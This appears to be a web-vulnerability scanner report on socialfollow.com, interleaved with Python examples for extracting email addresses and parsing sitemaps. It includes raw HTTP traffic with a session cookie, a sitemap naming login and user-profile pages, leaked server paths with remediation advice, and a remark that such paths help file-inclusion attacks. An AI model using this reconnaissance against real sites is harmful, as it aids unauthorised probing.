<!-- End SocialFollow.com Button Code --></li><li id="archives-2" class="widget widget_archive"><h2 class="widgettitle">Archives</h2> <ul> <li><a href='http://www.socialfollow.com/blog/2011/04/' title='April 2011'>April 2011</a></li> <li><a href='http://www.socialfollow.com/blog/2011/03/' title='March 2011'>March 2011</a></li> <li><a href='http://www.socialfollow.com/blog/2011/02/' title='February 2011'>February 2011</a></li> <li><a href='http://www.socialfollow.com/blog/2011/01/' title='January 2011'>January 2011</a></li> <li><a href='http://www.socialfollow.com/blog/2010/12/' title='December 2010'>December 2010</a></li> <li><a href='http://www.socialfollow.com/blog/2010/11/' title='November 2010'>November 2010</a></li> <li><a href='http://www.socialfollow.com/blog/2010/10/' title='October 2010'>October 2010</a></li> <li><a href='http://www.socialfollow.com/blog/2010/02/' title='February 2010'>February 2010</a></li> <li><a href='http://www.socialfollow.com/blog/2009/08/' title='August 2009'>August 2009</a></li> <li><a href='http://www.socialfollow.com/blog/2009/07/' title='July 2009'>July 2009</a></li> <li><a href='http://www.socialfollow.com/blog/2009/06/' title='June 2009'>June 2009</a></li> <li><a href='http://www.socialfollow.com/blog/2009/04/' title='April 2009'>April 2009</a></li> <li><a href='http://www.socialfollow.com/blog/2009/03/' title='March 2009'>March 2009</a></li> </ul></li><li id="categories-377264371" class="widget widget_categories"><h2 class="widgettitle">Categories</h2> <ul> <li class="cat-item cat-item-48"><a href="http://www.socialfollow.com/blog/c/analytics-2/" title="View all posts filed under Analytics">Analytics</a></li> <li class="cat-item cat-item-18"><a href="http://www.socialfollow.com/blog/c/featured/" title="View all posts filed under Featured">Featured</a></li> <li class="cat-item cat-item-3 current-cat"><a href="http://www.socialfollow.com/blog/c/future-features/" title="View all posts filed under Future Features">Future 
Features</a></li> <li class="cat-item cat-item-4"><a href="http://www.socialfollow.com/blog/c/new-releases/" title="View all posts filed under New Releases">New Releases</a></li> <li class="cat-item cat-item-5"><a href="http://www.socialfollow.com/blog/c/social-following/" title="View all posts filed under Social Following">Social Following</a></li> <li class="cat-item cat-item-59"><a href="http://www.socialfollow.com/blog/c/social-media-marketing-2/" title="View all posts filed under Social Media Marketing">Social Media Marketing</a></li> <li class="cat-item cat-item-44"><a href="http://www.socialfollow.com/blog/c/social-media-solutions/" title="View all posts filed under Social Media Solutions">Social Media Solutions</a></li> <li class="cat-item cat-item-60"><a href="http://www.socialfollow.com/blog/c/social-networking-2/" title="View all posts filed under Social Networking">Social Networking</a></li> <li class="cat-item cat-item-21"><a href="http://www.socialfollow.com/blog/c/tweets/" title="View all posts filed under Tweets">Tweets</a></li> </ul></li> <li id="recent-posts-2" class="widget widget_recent_entries"> <h2 class="widgettitle">Recent Posts</h2> <ul> <li><a href="http://www.socialfollow.com/blog/social-media-marketing-2/the-social-networking-squeeze-job/" title="The Social Networking Squeeze Job">The Social Networking Squeeze Job</a></li> <li><a href="http://www.socialfollow.com/blog/social-media-solutions/using-social-media-to-expand-your-nonprofit-organization/" title="Using Social Media to Expand the Reach of Your Nonprofit Organization">Using Social Media to Expand the Reach of Your Nonprofit Organization</a></li> <li><a href="http://www.socialfollow.com/blog/social-following/socially-optimized-seo-in-the-social-network/" title="Socially Optimized-SEO in the Social Network">Socially Optimized-SEO in the Social Network</a></li> <li><a 
href="http://www.socialfollow.com/blog/social-media-marketing-2/tips-for-the-socially-inept-basic-rules-of-networking-etiquette/" title="Tips for the Socially Inept: Basic Rules of Networking Etiquette">Tips for the Socially Inept: Basic Rules of Networking Etiquette</a></li> <li><a href="http://www.socialfollow.com/blog/social-following/social-butterfly-or-party-animal-what-is-your-social-media-marketing-plan/" title="Social Butterfly or Party Animal-What Is Your Social Media Marketing Plan?">Social Butterfly or Party Animal-What Is Your Social Media Marketing Plan?</a></li> </ul> </li> <li id="wp-cumulus" class="widget wp_cumulus_widget"> <h2 class="widgettitle">Topics</h2> <!-- SWFObject embed by Geoff Stearns geoff@deconcept.com http://blog.deconcept.com/swfobject/ --><script type="text/javascript" src="http://www.socialfollow.com/blog/wp-content/plugins/wp-cumulus/swfobject.js"></script><div id="wpcumuluswidgetcontent830033"><p style="display:none;"><a href='http://www.socialfollow.com/blog/tag/analytics/' class='tag-link-8' title='2 topics' style='font-size: 10.4705882353pt;'>analytics</a><a href='http://www.socialfollow.com/blog/tag/blogger-institute/' class='tag-link-32' title='1 topic' style='font-size: 8pt;'>Blogger Institute</a><a href='http://www.socialfollow.com/blog/tag/blogging-ot/' class='tag-link-41' title='1 topic' style='font-size: 8pt;'>Blogging OT</a><a href='http://www.socialfollow.com/blog/tag/button-placement/' class='tag-link-51' title='1 topic' style='font-size: 8pt;'>button placement</a><a href='http://www.socialfollow.com/blog/tag/definition-of-social-follow/' class='tag-link-13' title='1 topic' style='font-size: 8pt;'>Definition of Social Follow</a><a href='http://www.socialfollow.com/blog/tag/featured/' class='tag-link-18' title='5 topics' style='font-size: 14.5882352941pt;'>Featured</a><a href='http://www.socialfollow.com/blog/tag/features/' class='tag-link-42' title='1 topic' style='font-size: 8pt;'>Features</a><a 
href='http://www.socialfollow.com/blog/tag/fine-art-of-blogging/' class='tag-link-31' title='1 topic' style='font-size: 8pt;'>Fine Art of Blogging</a><a href='http://www.socialfollow.com/blog/tag/follow-me-button/' class='tag-link-35' title='2 topics' style='font-size: 10.4705882353pt;'>Follow Me Button</a><a href='http://www.socialfollow.com/blog/tag/go2web20net/' class='tag-link-19' title='1 topic' style='font-size: 8pt;'>Go2Web20.net</a><a href='http://www.socialfollow.com/blog/tag/interview/' class='tag-link-33' title='1 topic' style='font-size: 8pt;'>Interview</a><a href='http://www.socialfollow.com/blog/tag/kerry-jones/' class='tag-link-17' title='10 topics' style='font-size: 18.1568627451pt;'>Kerry Jones</a><a href='http://www.socialfollow.com/blog/tag/killerstartupscom/' class='tag-link-20' title='1 topic' style='font-size: 8pt;'>KillerStartups.com</a><a href='http://www.socialfollow.com/blog/tag/multiple-languages/' class='tag-link-34' title='1 topic' style='font-size: 8pt;'>Multiple Languages</a><a href='http://www.socialfollow.com/blog/tag/new-feature/' class='tag-link-36' title='2 topics' style='font-size: 10.4705882353pt;'>New Feature</a><a href='http://www.socialfollow.com/blog/tag/new-release/' class='tag-link-40' title='1 topic' style='font-size: 8pt;'>New Release</a><a href='http://www.socialfollow.com/blog/tag/plugin/' class='tag-link-39' title='1 topic' style='font-size: 8pt;'>Plugin</a><a href='http://www.socialfollow.com/blog/tag/professional-netw..
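
How the address above was found, as an added example rather than the scanner's own code: a regex pass over the body plus a second pass over the entity-decoded body, with each hit tagged by where it sits (HTML comment, script or visible text) so that a library credit, as here, can be separated from a site address. The sample HTML is a constructed cut of the response above; the entity-encoded support address and the example.invalid domain are added to show the decoded case.

```python
import html
import re

# Constructed excerpt of the /blog/c/future-features/ response above. The real
# address sits in the SWFObject attribution comment emitted by the wp-cumulus
# widget; the entity-encoded support address on the last line is added here to
# show the case a plain grep misses.
SAMPLE_HTML = """<li id="wp-cumulus" class="widget wp_cumulus_widget"> <h2 class="widgettitle">Topics</h2>
<!-- SWFObject embed by Geoff Stearns geoff@deconcept.com http://blog.deconcept.com/swfobject/ -->
<script type="text/javascript" src="http://www.socialfollow.com/blog/wp-content/plugins/wp-cumulus/swfobject.js"></script>
<p>Questions? Write to support&#64;example.invalid or use the form.</p>"""

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
COMMENT_RE = re.compile(r"<!--.*?-->", re.S)
SCRIPT_RE = re.compile(r"<script\b.*?</script>", re.S | re.I)


def _context(pos: int, spans) -> str:
    for (start, end), kind in spans:
        if start <= pos < end:
            return kind
    return "text"


def find_emails(body: str) -> dict:
    """Map each address to where it occurs: 'comment', 'script', 'text' or 'text (entity-encoded)'."""
    spans = [(m.span(), "comment") for m in COMMENT_RE.finditer(body)]
    spans += [(m.span(), "script") for m in SCRIPT_RE.finditer(body)]
    found = {}
    for m in EMAIL_RE.finditer(body):
        found.setdefault(m.group(0).lower(), _context(m.start(), spans))
    # Second pass over the entity-decoded body catches &#64; / &commat; obfuscation;
    # setdefault keeps the more precise context from the first pass.
    for m in EMAIL_RE.finditer(html.unescape(body)):
        found.setdefault(m.group(0).lower(), "text (entity-encoded)")
    return found


def classify(found: dict, site_domains: set) -> dict:
    """Split site-owned addresses (worth removing) from third-party ones (library credits)."""
    return {
        addr: ("site" if addr.rsplit("@", 1)[1] in site_domains else "third-party", ctx)
        for addr, ctx in found.items()
    }
```

Feeding classify() the site's own domains is what turns a raw hit list into a triage: a third-party address in a comment is a plugin-hygiene note, while a site address in visible text is the remedy above.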
Sitemap Identified

1 total, information

Netsparker identified a Sitemap file on the target web site. This issue is reported as extra information. The file matters to a tester because it enumerates pages a crawler might not otherwise reach; here it lists the login and forgot-password pages and many per-user /profiles/ entries.

Impact

This issue is reported as extra information; there is no direct impact resulting from it.
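
Parsing the sitemap into a crawl seed, as an added example that is not part of the report: the sitemap namespace must be handled or every findall() returns nothing, a <sitemapindex> must be recognised as a pointer to further sitemaps rather than a page list, and off-host entries should be dropped. The sample is a constructed cut of the /sitemap.xml response listed under this finding; the INTERESTING keywords are my choice.

```python
import xml.etree.ElementTree as ET
from collections import Counter
from urllib.parse import urlsplit

# Constructed: the head of the /sitemap.xml response below, cut to seven entries.
SAMPLE_SITEMAP = """<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
<url><loc>http://www.socialfollow.com/</loc><priority>1.00</priority></url>
<url><loc>http://www.socialfollow.com/forgot-password.php</loc><priority>0.50</priority></url>
<url><loc>http://www.socialfollow.com/profiles/</loc><priority>0.90</priority></url>
<url><loc>http://www.socialfollow.com/profiles/abhi/</loc><priority>0.51</priority></url>
<url><loc>http://www.socialfollow.com/profiles/abhishek/</loc><priority>0.51</priority></url>
<url><loc>http://www.socialfollow.com/login.php</loc><priority>0.85</priority></url>
<url><loc>http://www.socialfollow.com/blog/tag/plugin/</loc><priority>0.64</priority></url>
</urlset>"""

SM = "http://www.sitemaps.org/schemas/sitemap/0.9"
NS = {"sm": SM}
# Path fragments a tester wants to see first when a sitemap seeds the crawl (my choice).
INTERESTING = ("login", "password", "register", "admin", "xmlrpc", "contact")


def sitemap_urls(xml_text: str, expected_host: str = "") -> list:
    """Return the <loc> URLs of a urlset, optionally restricted to one host."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    # A <sitemapindex> lists child sitemaps, not pages: the caller must fetch those.
    if root.tag != f"{{{SM}}}urlset":
        raise ValueError(f"not a urlset: {root.tag}")
    urls = [loc.text.strip() for loc in root.findall("sm:url/sm:loc", NS) if loc.text]
    if expected_host:
        # Drop off-host entries: a sitemap can also steer a crawler somewhere else.
        urls = [u for u in urls if urlsplit(u).hostname == expected_host]
    return urls


def summarize(urls) -> tuple:
    """Count entries per top-level path segment and list the auth-related ones."""
    by_prefix = Counter(urlsplit(u).path.split("/")[1] or "/" for u in urls)
    interesting = sorted(
        u for u in urls if any(k in urlsplit(u).path.lower() for k in INTERESTING)
    )
    return dict(by_prefix), interesting
```

The per-prefix counts are the quick read of the attack surface (how much of the site is user-generated profile pages versus blog archive), and the interesting list is where the form-based tests start.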
- /sitemap.xml

/sitemap.xml

http://www.socialfollow.com/sitemap.xml

Request

GET /sitemap.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Fri, 18 Jun 2010 23:42:18 GMT
ETag: "19abdf-e460-4895681664a80"
Accept-Ranges: bytes
Content-Length: 58464
Keep-Alive: timeout=2, max=97
Connection: Keep-Alive
Content-Type: application/xml


<?xml version="1.0" encoding="UTF-8"?>
<urlset
xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
<!-- created with Free Online Sitemap Generator www.xml-sitemaps.com -->

<url>
<loc>http://www.socialfollow.com/</loc>
<changefreq>monthly</changefreq>
<priority>1.00</priority>
</url>
<url>
<loc>http://www.socialfollow.com/forgot-password.php</loc>
<changefreq>monthly</changefreq>
<priority>0.50</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.90</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/</loc>
<changefreq>monthly</changefreq>
<priority>0.90</priority>
</url>
<url>
<loc>http://www.socialfollow.com/terms-and-conditions.php</loc>
<changefreq>monthly</changefreq>
<priority>0.20</priority>
</url>
<url>
<loc>http://www.socialfollow.com/privacy-policy.php</loc>
<changefreq>monthly</changefreq>
<priority>0.20</priority>
</url>
<url>
<loc>http://www.socialfollow.com/contact-us.php</loc>
<changefreq>monthly</changefreq>
<priority>0.80</priority>
</url>
<url>
<loc>http://www.socialfollow.com/sitemap.php</loc>
<changefreq>monthly</changefreq>
<priority>0.80</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/movingpartsaudio/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/frozenrodeo/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/theannandalecardinals/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/heartofthelakesrecords/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/a-special-touch/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/a-vintage-revolution/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/aarontimlin/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/abhi/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/abhishek/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/academy-of-life-and-leadership/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/achraf52/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/acquaspa/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/adam-haider/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/adamlinsley/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/login.php</loc>
<changefreq>monthly</changefreq>
<priority>0.85</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/wordpress-plugin-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/kerry-jones/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/new-feature/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/plugin/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/wordpress/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/new-releases/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/server-upgrade-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/new-release/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-26-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/tweets/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/twitter/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/tweets/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-26/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19-3/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-4/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-3/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/page/2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/08/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/07/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/06/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/04/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/03/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/future-features/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/social-following/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/analytics/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/blogger-institute/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/definition-of-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/fine-art-of-blogging/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/follow-me-button/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/go2web20net/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/interview/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/killerstartupscom/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/multiple-languages/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/rafferty-pendery/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/raffy-pendery/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/reputation-management/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-button/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-following/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-new-releases/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-user-flow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-networking-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-networks/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/studio98/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/twitter-feed/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/visionwiz/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/vote-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/vote-for-us/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/ziipa/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/social-follow-almost-launched/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/social-follow-button-user-flow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/social-following/definition-of-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/social-following/social-follow-joins-twitter/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/banner/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barandide/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barneykavai/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barry-shereshevsky/</loc>
<changefreq>monthly</changefreq>
<pr..
[Possible] Internal Path Leakage (*nix)

3 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact; however, this information can help an attacker during the exploitation of other vulnerabilities: an absolute path such as the document root is exactly what a local file inclusion or path traversal payload needs in order to reach a specific file.

Remediation

Every path in this finding arrives as a PHP diagnostic written straight into the response body, so the primary fix is configuration: in the production php.ini set display_errors = Off and log_errors = On, with error_log pointing at a file outside the web root, so that diagnostics go to the server log and never to the client. The warnings also point at defects worth fixing on their own. /button/social-follow.php and /button/image/index.php pass the result of a failed query to mysql_num_rows() and mysql_fetch_assoc(), so the return value of mysql_query() must be checked before it is used, and the query should use bound parameters rather than string concatenation of request input such as b; the "headers already sent" warnings disappear once header() is called before any output. Because /button/ is served with Content-Type: text/javascript, the HTML warning text prepended to the body also makes the script itself unparseable for the pages that load it. The theme's index.php fails because it is requested outside WordPress; the usual guard is to exit when the ABSPATH constant is not defined, or to deny direct requests for wp-content/themes/*/*.php in the web server configuration.

External References

- /button/

/button/

http://www.socialfollow.com/button/

Identified Internal Path(s)

/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php

Request

GET /button/ HTTP/1.1
Referer: http://www.socialfollow.com/button/image/?b=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:31 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Keep-Alive: timeout=2, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/javascript


<br/><b>Warning</b>:mysql_num_rows():supplied argument is not a valid MySQL result resource in<b>/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php</b>on line<b>6</b><br/><br/><b>Warning</b>:Cannot modify header information-headers already sent by(output started at/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php:6)in<b>/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php</b>on line<b>19</b><br/>var menu={divclass:'sociallinks',inlinestyle:'visibility:hidden',linktarget:'secwin'};menu.cols={divclass:'column',inlinestyle:''};menu.items=[];var socialfollow={init:function(targetclass){socialfollow.init(targetclass);}}var socialfollow={menusmap:{},effects:{delayhide:200,shadow:{enabled:true,opacity:0.3,depth:[5,5]},fade:{enabled:false,duration:500}},dimensions:{},getoffset:function(what,offsettype){return(what.offsetParent)?what[offsettype]+this.getoffset(what.offsetParent,offsettype):what[offsettype]},getoffsetof:function(el){el._offsets={left:this.getoffset(el,"offsetLeft"),top:this.getoffset(el,"offsetTop"),h:el.offsetHeight}},getdimensions:function(menu){this.dimensions={anchorw:menu.anchorobj.offsetWidth,anchorh:menu.anchorobj.offsetHeight,docwidth:(window.innerWidth||this.standardbody.clientWidth)-20,docheight:(window.innerHeight||this.standardbody.clientHeight)-15,docscrollx:window.pageXOffset||this.standardbody.scrollLeft,docscrolly:window.pageYOffset||this.standardbody.scrollTop}if(!this.dimensions.dropmenuw){this.dimensions.dropmenuw=menu.dropmenu.offsetWidth;this.dimensions.dropmenuh=menu.dropmenu.offsetHeight;}},isContained:function(m,e){var e=window.event||e;var c=e.relatedTarget||((e.type=="mouseover")?e.fromElement:e.toElement)while(c&&c!=m)try{c=c.parentNode}catch(e){c=m}return(c==m)?true:false;},setopacity:function(el,value){el.style.opacity=value;if(typeof 
el.style.opacity!="string"){el.style.MozOpacity=value;if(el.filters)el.style.filter="progid:DXImageTransform.Microsoft.alpha(opacity="+value*100+")"}},showmenu:function(menuid){var menu=socialfollow.menusmap[menuid];clearTimeout(menu.hidetimer);this.getoffsetof(menu.anchorobj);this.getdimensions(menu);var posx=menu.anchorobj._offsets.left+(menu.orientation=="lr"?this.dimensions.anchorw:0);var 